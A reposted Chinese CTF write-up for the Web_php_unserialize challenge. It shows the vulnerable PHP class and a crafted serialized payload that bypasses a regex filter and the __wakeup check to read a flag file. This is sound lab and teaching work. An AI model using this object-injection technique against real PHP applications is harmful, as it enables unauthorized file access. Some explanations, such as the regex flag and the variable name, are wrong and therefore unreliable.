ICode9

精准搜索请尝试: 精确搜索
首页 > 编程语言> 文章详细

攻防世界:web——Web_php_unserialize

2021-08-23 22:02:02  阅读:279  来源: 互联网

标签:Web 序列化 web fl4g oc unserialize file var php


靶场内容:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

很显然,解题的关键点有两个:

  • function __wakeup() :这个方法的存在阻止我们将序列化文件传入
  • preg_match('/[oc]:\d+:/i', $var):这个过滤器的存在阻止我们的序列化参数

/[oc]:\d+:/i是一个正则表达:

  • [oc] 匹配所有的o和c两个字符
  • \d 匹配所有整数
  • /i 匹配所有的字母

也就是说,我们如果输入任意的序列化参数,都会被搞掉
题目告诉了我们flag文件是fl4g.php

我们可以生成序列化:

$a = new Demo('fl4g.php');
echo serialize($b);

序列化是这样的 O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
我们可以稍作修改,比如:
O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}
再用base64编码,传递var参数,就可以直接得到flag了

标签:Web,序列化,web,fl4g,oc,unserialize,file,var,php
来源: https://www.cnblogs.com/Zeker62/p/15177903.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有